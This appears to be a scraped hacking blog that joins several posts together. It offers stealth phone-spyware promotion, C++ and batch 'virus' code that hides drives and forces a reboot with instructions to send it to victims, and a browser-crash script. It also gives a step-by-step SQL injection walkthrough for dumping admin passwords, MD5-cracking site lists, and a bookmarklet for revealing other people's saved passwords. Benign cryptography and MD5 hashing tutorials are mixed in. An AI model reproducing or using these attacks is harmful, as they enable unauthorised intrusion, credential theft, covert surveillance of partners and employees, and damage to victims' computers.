Keylogger for Mobile Phones-Mobile Spy

So far we have seen lot of keyloggers for computer.  Now  i am going to introduce mobile spy software to my blog visitors.

Mobile Spy is the next generation of smartphone spy software. Do you suspect that your child or employee is abusing their SMS or vehicle privileges? If yes, then this software is ideal for you. Install this small program directly onto your compatible smartphone you want to monitor to begin recording.



Using the Internet capabilities of your phone, recorded activities, logs and GPS locations are quickly uploaded to your Mobile Spy account. To view the results, you simply login to your secure account at the Mobile Spy web site. Logs are displayed by categories and sorted for easy browsing.

The software is completely stealth and works independently. Mobile Spy does not rely on the phone's call and message logs to record activities. So even if the user tries to delete their tracks, the data will still be retained and uploaded. Compatible with most models of iPhone, BlackBerry or Android phones! Also compatible with Windows Mobile, Symbian OS and iPad.

Features:

Call Log: Each incoming and outgoing number is logged along with duration and time stamp.

SMS (Text Messages) Log:Every text message is logged even if the phone's logs are deleted. Includes full text.

GPS Locations Log:  GPS postions are uploaded every thirty minutes with a link to a map.

Contacts: Every contact on the phone is logged. New contacts added are also recorded.

Tasks: All personal tasks that are created are logged and viewable.

Memos:  Every memo input into the phone is logged and viewable.

Cell ID Locations:

ID information on all cell towers that the device enters into range of is recorded.

E-Mail Log:

All inbound & outbound email activity from the primary email account is recorded.
 
Calendar Events

Every calendar event is logged. Date, time, and locations are recorded.

URL (Website) Log

All URL website addresses visited using the phone's browser are logged.

Photo & Video Log

All photos & videos taken by the phone are recorded & are viewable.



For More Details Visit:

http://www.mobile-spy.com/

C++ ,Batch Virus code to disable All Hard disk

Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.

C++ Virus Code :

#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }

Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.


Batch Virus Code Creation:

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f

I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim

Crashing Client's Browser with Javascript

Hi this is very simple javascript code to crash the client browser. If you don't know about javascript ,visit www.w3schools.com(i learn lot of languages quickly there).

<script type='javascript'>
function crash()
{
while(1==1)
{
location.reload(true);
}
</script>

This code will reload the page again and again for infintive time and crash the browser.

How to use it?  Paste the above code in header section.  When page is loaded,the page will reload.  For that use onload handling in body as attribute. can't get you ?
Just see this example:

<body onload='crash()'>

The complete cod is:

<html>
<head>
<script type='javascript'>
function crash()
{
while(1==1)
{
location.reload(true);
}
</script>
</head>
<body onload='crash()'>
</body>
</html>

MD5 Encryption Java Program(not Decryption)-Message Digest Algorithm

MD5 is one of the famous Hash algorithm.  This algorithm is used in many websites for storing the password in encrypted form. The MD5 message-digest algorithm was developed by Ronald Rivest at MIT in 1992. This algorithm takes a input message of arbitrary length and produces a 128-bit hash value of the message.

  MD5 is one way encryption method,means only encryption no decryption(but there is lot of hackers helping site to decrypt it).

For java programmers it is easy to encrypt the password with MD5.  How?  go ahead...


For two days ,  i didn't post anything because i was doing my NIIT project.  Yesterday only i finished it.  My project is Online banking service.   In my project i have planned to store the password in encrypted password.  But i don't know how to do that?  When i search for algorithm in internet, i came to know that java itself have MD5 algorithm Class.  I got surprised.  Now my project's customers password are stored in 128 bit encrypted form.

Now  I will help you how to use the MD5 Class in java.

Step 1:

• First of all you have to create  a class named as "ByteToHex" for future use.
• Delete Main function(if you are working in  netbeans)
• Create a new Function named as "byteToHex()"

The Source code should be :

package Model;

public class ByteToHex {

public static String bytesToHex(byte[] b) {

char hexDigit[] = {'0', '1', '2', '3', '4', '5', '6', '7',
'8', '9', 'A', 'B', 'C', 'D', 'E', 'F'};
StringBuffer buf = new StringBuffer();
for (int j=0; j<b.length; j++) {
buf.append(hexDigit[(b[j] >>4) & 0x0f]);
buf.append(hexDigit[b[j] & 0x0f]);
}
return buf.toString();
}

}

Save the file

Step 2:

• create a new class with main fucntion.
• import the following packages :

import Model.ByteToHex;

import java.security.MessageDigest;

Use the following code for MD5 encryption:

/*MD5 Encryption goes here-1 way encryption*/

String cipher=null;


try

{



MessageDigest md = MessageDigest.getInstance("MD5");

String input=password;  //storing the password in input string

md.update(input.getBytes()); //storing the password in md object as bytes

byte[] output = md.digest();  //producing the 128 bit output using the md5 algorithm

cipher= ByteToHex.bytesToHex(output); //converting the bytes to string and storing in cipher String

}

catch (Exception e) {

System.out.println("Exception: "+e);

}

/*MD5 Encryption ends here-1 way encryption*/

I hope you understand.  if you have doubts ,comment here.  I will help you.  This program is only for Java programs.  in future i will give you MD5  code for PHP.

you can use SHA-1 algorithm also .By Editing the following line :
MessageDigest.getInstance("MD5");
as
 MessageDigest.getInstance("SHA-1");

Hack to Enable Right Click in Websites

Is your favorite website disabled the right click button? No need to worry.  you can enable the Right Click button after reading this article.

There are different tools  for disabling the javascript.   But i will introduce again my favorite and best web delveloper tool for you.  This is one of best tool for hackers.



Download it and install in mozilla

https://addons.mozilla.org/en-US/firefox/addon/web-developer/

you can see Disable button in toolbar section.

click the button
You can now see the "disable Javascript" option
Select it.
Again select "All Javascript" option.

That's all your favorite website's javascript is disabled.
You can now use right click.

Want to say thanks? instead of saying simply thanx. Just share this link in
stumblupon or delicious or reddit or any other public social bookmark sites. If you are doing so,I am thankful to you

Note:

The above toolbar not only disable the javascript but also image ,css and more(for loading the website faster).

How to hide the windows while running the virus code?

Good Morning Friends...!!  This day will be great day!  Because Break The Security get top rank in blogger directories. 

Now i am going to introduce a new tool called as "CMDOW" .   When you create and send virus to victim, the virus running process may be shown to victims.  This tool will hide that also.

About Cmdow

Cmdow is a Win32 commandline utility for NT4/2000/XP/2003 that allows windows to be listed, moved, resized, renamed, hidden/unhidden, disabled/enabled, minimized, maximized, restored, activated/inactivated, closed, killed and more.

Cmdow is 31kb standalone executable. It does not create any temporary files, nor does it write to the registry. There is no installation procedure, just run it. To completely remove all traces of it from your system, delete it.

Cmdow was written with batch file programmers in mind. Particular attention has been paid to Cmdows output making it easy to process with the 'FOR /F' command found in NT4/2000/XP/2003.


For more details and Download from here:

http://www.commandline.co.uk/cmdow/

Cracking MD5 Hash algorithm-List of websites 2

I have listed some website  in previous posts.  some of other sites listed here. List of Websites to crack the MD5 Hash Algorithm

•  www.tmto.org
•  md5.noisette.ch
• md5decryption.com
• www.c0llision.net
• www.netmd5crack.com
• www.md5decrypter.com
• md5hashcracker.appspot.com
• www.hashhack.com
• isc.sans.edu
• www.md5crack.com
• passcracking.com
• authsecu.com
• md5.rednoize.com
• md5.web-max.ca
• www.cmd5.com
• md5.thekaine.de
• www.shell-storm.org
• www.md5this.com
• www.hashchecker.com
• hashcrack.com
• md5pass.com
• md5pass.info 

A List of Message Digest(MD5) Cracking websites

http://www.md5lookup.com/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://md5crack.com/crackmd5.php

http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/
http://passcrack.spb.ru/ ->sha1
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.securitystats.com/tools/hashcrack.php ->sha1
http://www.md5decrypter.com/
http://www.md5encryption.com/ ->sha1
http://www.md5database.net/
http://md5.xpzone.de/
http://www.milw0rm.com/md5/info.php
http://md5.geeks.li/
http://www.hashreverse.com/ ->sha1
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php ->sha1
http://rainbowcrack.com/ ->sha1
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in…roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.shalookup.com/ ->sha1

lm Only:
http://sys9five.ath.cx:8080/hak5rtables/
http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/

some more links

http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
http://www.md5-db.com/
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.milw0rm.com/md5/
http://www.mmkey.com/md5/
http://www.rainbowcrack-online.com/
http://www.securitydb.org/cracker/
http://www.securitystats.com/tools/hashcrack.php
http://schwett.com/md5/
http://www.und0it.com/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://www.tmto.org
http://md5.rednoize.com/
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.php?main_page=product_info&cPath=3&products_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/

http://sha1search.com/

Introduction to Cryptography

Now a days Internet is important part of Life.  We are using Internet for sending confidential data also like password,for storing army secrets. But the Internet is insecure medium.  Do you know why?

Insecure Medium:
  Imagine you are sending a data.  In internet world data are separated as packets and send to destination.  Do you think the data directly reaching the destination?   If  you think so,you are wrong.  The packets are going through different routers.  Finally the data is send to user.  In this gap, Intruders(i mean attackers) takes advantages.  Intruders can see what you are sending.  Because your data are simple and easy to readable by anyone.


How to secure the data?
    We can not stop the intruders and their activities.  But we can make our data as Unreadable for Intruders.  For this purpose the Cryptography is introduced.

Introduction to Cryptography:
     Julius Ceaser who introduce the Cryptography technology.  Cryptography is technology in which we are changing the plain text to unreadable text(known as cipher text) .

In your home you put money in locker,  Isn't it?  The locker probably has key to open.  Imagine  thief is coming to your home to steal.  if he want to open the locker,certainly he need the key.  Without the key he can not do. Yeah i can hear what you are saying, he can break the locker.  If the locker is very strong,he can not open it at all.

Likewise in cryptography also we are going to create a Key for our data.  So that Intruders can not read the data.  It is possible to read the data, if the encryption(will explain later) is weak.  So we need to encryption method very strong.


Terminologies used In cryptography:
   Plain Text:
               original data or text is known as Plain text.
   Cipher Text:
              The encrypted message(unreadable message).
   Encryption:
             Changing the Plain text to unreadable.
   Decryption:
            Changing the cipher text to plain text.

Traditional Encryption Methods:

• Ceaser Cipher
• Mono Alphabetic Cipher
• Play Fair Cipher
• Hill cipher
• Poly Alphabetic Cipher
• Rail Fence Technique.

Ceaser Cipher:
  Most simplest encryption method.  In this method we are going to replace the alphabets with shifted alphabets.
Eg:
Consider Plain text is:  break
if we use Key is 3, then the cipher text will be  found by:
 
        b+3 r+3 e+3 a+3 k+3
Shifted to three alphabets final cipher text is:

         euhdn

If the intruders see the cipher text(here "euhdn") ,he can not understand anything.   But this method is easily hackable .  Because intruders can try 25 shifts and finally he can get the result. 
  
Many encryption methods are introduced to make better security.

Today  Encryption methods:

•  AES(Advanced Entyption Standard)
• DES(Data Encryption Standard)
• RSA(Name of the creators).
• MD5(Message Digest -5)
• SHA(Secure Hash Algorithm

 For secure transaction , SSL (Secure Socket Layer ) is introduced.  In next post i'll give detailed explanation for the SSL layer.

Hacking website using SQL Injection -step by step guide

Before we see what  SQL Injection is. We should know what SQL and Database are.

Database:
Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.



Some List of Database are:

* DB servers,
* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,



SQL:
Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

Definition from Complete reference:

SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name "SQL" is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation
"S.Q.L." is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database.

Simple Basic Queries for SQL:

Select * from table_name :
this statement is used for showing the content of tables including column name.
For eg:
select * from users;

Insert into table_name(column_names,...) values(corresponding values for columns):
For inserting data to table.
For eg:
insert into users(username,userid) values("blackstar","black");

I will give more detail and query in my next thread about the SQL QUERY.

What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

Now let's dive into the real procedure for the SQL Injection.
Follow my steps.

Step 1: Finding Vulnerable Website:
Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A...t.zip.html

How to use?
copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.


Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:

site:www.victimsite.com inurl:index.php?id=

 Step 2: Checking the Vulnerability:
Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes)

For eg:

http://www.victimsite.com/index.php?id=2'

 If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!
For eg:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:
Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(') with "order by n" statement.(leave one space between number and order by n statement)

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg:

http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4

 change the number until you get the error as "unknown column"

if you get the error while trying the "x"th number,then no of column is "x-1".

I mean:

http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)
 

 so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the "--" at the end of the statement.
For eg:

http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Displaying the Vulnerable columns:
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns).

Like this:



Now select 1 number.
It showing 3,7. Let's take the Number 3.

Step 5: Finding version,database,user
Now replace the 3 from the query with "version()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table Name
Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

 Now it will show the list of table names. Find the table name which is related with the admin or user.




Now select the "admin " table.


Step 7: Finding the Column Name

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.


Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..


Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.


Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:

http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.

Enjoy..!!cheers..!!

If the website has members then jock-bot for you. You will have the list of usernames and password.
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.

Step 8: Finding the Admin Panel:
Just try with url like:

http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/

etc.
If you have luck ,you will find the admin page using above urls. or try this list .
Here is the list of admin urls:

http://www.ziddu.com/download/13163866/A...t.zip.html

Introduction to Cracking MD5 Encryption- Breaking the Hash Functions

You may often hear this word "MD5 Encryption".  If you don't know what it is, this introduction may help you.  If you know about MD5 Algorithm, you can skip to Cracking MD5 Encryption Section In this article i will explain clearly what MD5 Encryption.

When this will be useful for you?

1. You hacked one website's database using SQL Injection(SQL Injection TUTORIAL HERE),  but the passwords are stored using MD5 or SHA-1 Hash Algorithm.  At that time this tutorial will help to decrypt the password.
2. You want to know basics of MD5 Hash Algorithm.
3. You like to learn how to Cracking MD5 Hash Algorithm.

Introduction to MD5 Algorithm:
you can refer this link Introduction To Cryptography ,if you don't know about  encryption.

MD5 is widely used Hash Algorithms by Website owners. MD5 was designed by Ron Rivest in 1991 to replace an earlier hash function, MD4.

It is not like usual encryption. Usually we encrypt the original text to cipher text then decrypt the cipher text to original text.

we can call the MD5 as "One Way Encryption"(No longer).

It is like one way path.  one can move to destination but can not come back to starting place. 



Encrypt(originalText) 
Decrypt(cipherText)

Using MD5 Hash algorithm we can only create a hash code.  Original Text is converted to 128 bits hash code(encrypted form). 

Consider my original text is "worldblackstar".

It will be converted to

4d5b1f935be3c24a41c3e682304c55cb

 Algorithm:
MD5 processes a variable-length message into a fixed-length output of 128 bits. The input message is broken up into chunks of 512-bit blocks (sixteen 32-bit little endian integers); the message is padded so that its length is divisible by 512. The padding works as follows: first a single bit, 1, is appended to the end of the message. This is followed by as many zeros as are required to bring the length of the message up to 64 bits fewer than a multiple of 512. The remaining bits are filled up with a 64-bit integer representing the length of the original message, in bits.
The main MD5 algorithm operates on a 128-bit state, divided into four 32-bit words, denoted A, B, C and D. These are initialized to certain fixed constants. The main algorithm then operates on each 512-bit message block in turn, each block modifying the state. The processing of a message block consists of four similar stages, termed rounds; each round is composed of 16 similar operations based on a non-linear function F, modular addition, and left rotation. Figure 1 illustrates one operation within a round. There are four possible functions F; a different one is used in each round:

denote the XOR, AND, OR and NOT operations respectively.

MD5 HASHES:

The 128-bit (16-byte) MD5 hashes (also termed message digests) are typically represented as a sequence of 32 hexadecimal digits. The following demonstrates a 43-byte ASCII input and the corresponding MD5 hash:

MD5("The quick brown fox jumps over the lazy dog")
= 9e107d9d372bb6826bd81d3542a419d6

The hash of the zero-length string is:

MD5("")
= d41d8cd98f00b204e9800998ecf8427e

Refer For More

Cracking MD5 Hash Algorithm:

In 1996, World comest to know that there are some flaws in MD5 HASH Algorithm.  Cryptographers began recommending the use of other algorithms, such as SHA-1 (which has since been found also to be vulnerable).

Boer Showed that MD5 is executed on 1 block of 512 bits will yield the same output for different input values in the buffer ABCD. This is known as Pseduo Collision.

Berson said Differential crypt analysis, with in a reasonable time to find 2 messages that produce this same hash code.

Dictionary Method on MD5:
In dictionary method the hash code will compared with some usual passwords.

For Eg: Users may give simple and usual password like "love","iloveyou".
Convert this usual words to Hash code.
Then store the words to Dictionary.
Compare User's Hash code with each hash code which is listed in dictionary.

Birthday Attacks On MD5:
Name itself define the attack method.  You alone birth on your birthday?  The answer is negative, there are lot of people born on your birthday.  The same method is used here.  Some of original text will use same Check Sum.

How to Crack MD5?

You don't need to write algorithm to crack the MD5.  There are plenty of websites available to crack the MD5.
I have listed the list of websites in my previous post.
Refer these link:

1. List of Websites to crack the MD5 Hash Algorithm
2.  List 2 for cracking MD5

How to See Saved Password in Mozilla firefox

Here is simple hacking tutorial to view the saved passwords in Mozilla firefox.
While visiting public internet cafe ,some innocent peoples click the "Remember" while mozilla asking for remembering.   This is one of the benefit for us to hack their account in very simple way.

Follow these steps to see the saved Passwords:

• click the "Tools" menu in menu bar.
• Select Options
• It will open a small window
• Select the "security" tab in that small window
• You can view "saved Passwords" button

• Click that button.
• It will another small window
• There will be list of sites with usernames
• Select One site and click the "show Password"
• It will clearly show you the password

How to see remembered password | Password autofill cracked

I am going to teach you how to see the passwords which are shown as astersik characters(*).

What is the use?

if your friend/lover select the remember passwords option when login,then you got the chance to hack their password without much effort(no need of phishing ).


Two cases:

Case I: 
if they select remember password in mozilla popup. It is easy to see the password using this method: How to see the saved passwords in mozilla?

Second I:
If the select remember passwords in login form , here is the another method.

How to see the remembered passwords ?
 Whenever someone select remember password in login form,the passwords will be automatically filled.  But the problem is that we can login but can not see the password.  Because the password will be shown as "astersik characters"(*).  Her e is the trick to crack that also.

Visit any site which remembers passwords and show astersik characters in password box.

Copy the following code

javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();

Paste in the address bar.
Press enter key
Now the hidden password behind the astersik character will be shown.


Tutorial With Example Picture:
Lets take the yahoomail.com
if the password is auto filled as shown in the picture, then this method will work for you.

Proxy Server IP Address List

100 percentage working proxy server ip address list

Here is the list of proxy server address. use it and enjoy.

94.125.27.20:8080
93.91.200.146:8080
81.18.116.66:808079.125.28.242:3128
72.52.96.9:80
72.52.96.11:80
69.13.229.214:3128
68.96.75.146:9090
64.87.46.57:3128
64.23.156.82:8080
62.142.57.72:8080
61.79.87.93:3128
61.6.163.30:8080
61.244.235.34:3128
61.156.25.222:8080
58.215.78.157:808
58.17.71.121:8080
41.190.16.17:8080
222.77.69.210:3128
217.197.121.188:8080
216.27.81.163:8080
216.185.4.200:8080
213.192.246.133:80
213.192.246.133:80
213.192.246.130:80
213.192.246.130:80
213.151.33.58:3128
213.151.033.058:3128
213.109.130.80:54321
212.158.160.96:80
212.118.224.151:80
212.118.224.151:80
212.118.224.150:80
212.118.224.150:80
212.118.224.148:80
211.138.124.232:80
211.138.124.232:80
211.138.124.217:80
211.138.124.213:80
211.138.124.212:80
211.138.124.209:80
211.138.124.200:80
211.138.124.199:80
211.138.124.199:80
211.138.124.180:80
211.138.124.179:80
211.138.124.178:80
211.138.124.174:80
211.138.124.173:80
211.138.124.170:80
211.138.124.169:80
211.138.124.167:80
210.212.55.194:3128
210.187.51.43:8080
210.125.51.41:80
210.107.100.251:8080
209.203.19.2:8080
208.92.249.118:80
208.115.60.146:8080
208.100.40.46:80
208.100.40.46:80
208.100.40.43:80
208.100.40.42:80
207.135.129.5:8080
207.135.129.5:8080
206.196.111.110:80
205.213.195.70:8080
203.139.145.2:3128
202.201.34.101:3128
202.169.226.208:8080
202.162.192.232:8080
202.149.25.43:8080
202.143.146.205:8080
202.115.12.162:808
201.76.211.246:8080
201.20.18.165:3128
200.57.88.164:80
200.36.104.230:8080
200.36.104.230:8080
200.101.82.4:8088
199.3.183.242:8088
196.30.6.186:80
196.29.161.85:8080
196.29.161.84:8080
196.29.161.84:80
196.29.161.82:80
196.29.161.81:80
190.202.124.18:3128
190.141.4.5:8080
190.128.169.122:3128
190.120.10.71:3128
189.72.251.166:8080
189.61.196.10:3128
189.45.245.126:3128
189.17.118.10:3128
189.114.58.242:3128
189.11.211.237:3128
188.59.252.190:80
188.165.205.62:80
187.87.203.209:3128
187.45.232.176:8080
187.45.232.176:8000
187.45.213.100:3128
187.115.162.6:3128
187.115.162.6:3128
184.73.50.88:8118
184.73.131.27:80
184.73.120.223:80
184.73.114.189:8080
184.73.114.189:3128
184.72.9.242:8080
184.72.9.242:8000
184.72.9.242:80
184.72.9.242:443
184.72.9.242:3128
184.106.242.128:80
175.106.17.229:8080
174.143.202.39:80
174.143.168.38:8081
174.142.40.86:3128
174.142.40.84:3128
173.203.78.165:8080
173.203.78.165:3128
168.216.38.209:8080
164.78.252.24:80
164.78.252.24:80
164.078.252.110:80
164.078.252.025:80
125.95.189.82:8080
125.21.227.206:80
122.228.202.236:3128
122.184.133.210:8080
122.183.136.59:80
121.30.255.38:8080
120.50.57.234:3128
119.167.219.78:80
119.167.219.078:80
119.110.97.28:3128
119.110.97.28:3128
118.98.212.242:3128
118.98.160.99:80
118.98.160.99:3128
118.97.224.2:8080
118.97.224.2:8080
118.97.224.2:80
118.97.224.2:3128
118.97.169.173:8080
118.69.127.34:3128
117.40.29.89:80
111.1.32.93:80
111.1.32.92:80
111.1.32.91:80
111.1.32.8:80
111.1.32.7:80
111.1.32.72:80
111.1.32.71:80
111.1.32.69:80
111.1.32.61:80
111.1.32.59:80
111.1.32.4:80
111.1.32.47:80
111.1.32.45:80
111.1.32.44:80
111.1.32.19:80
111.1.32.15:80
110.164.66.98:3128
087.224.133.108:8080
082.206.129.160:3128
061.079.087.093:3128
058.056.108.114:80

How to Use Proxy IP address ?-Change the Ip address

Hi friends, i give a list of proxy servers about 100.  But i forget to tell how it will be useful ,how to use it. In this post, i will explain how to use the proxy server.

What is the Use of The Proxy?
Hide your IP.  Browse the Internet anonymously. 



Get the List of Proxy from here:

Proxy Server IP Address List

How to Use?
Mozilla is the famous browser. So i will explain how to use the proxy servers in Mozilla.

Open Mozilla FireFox.
Select Tools from menu bar(or simply press ALT+T)
Click the Options
Small window Will Open.
Navigate to Advanced tab
Click Settings.
Now select the Manual Proxy Configuration Radio Button.
Paste the one of the Ip address of Proxy server and set the Port as defined in the list.
For Eg:
Let's take this proxy
058.056.108.114:80
 Here ip address is  058.056.108.114
Port no is :80 
That's all click ok.
Now to check the whether your ip address is changed or not, visit "www.whatismyipaddress.com".

Anonymous surfing using Proxy Switcher Add on

Hi friends i have explained how to use the proxy ip address list with mozilla firefox in this post:How to use proxy server to hide ip?. Now it is more simple to use the proxy server using mozilla firefox premium proxy switcher add on.



Main features:
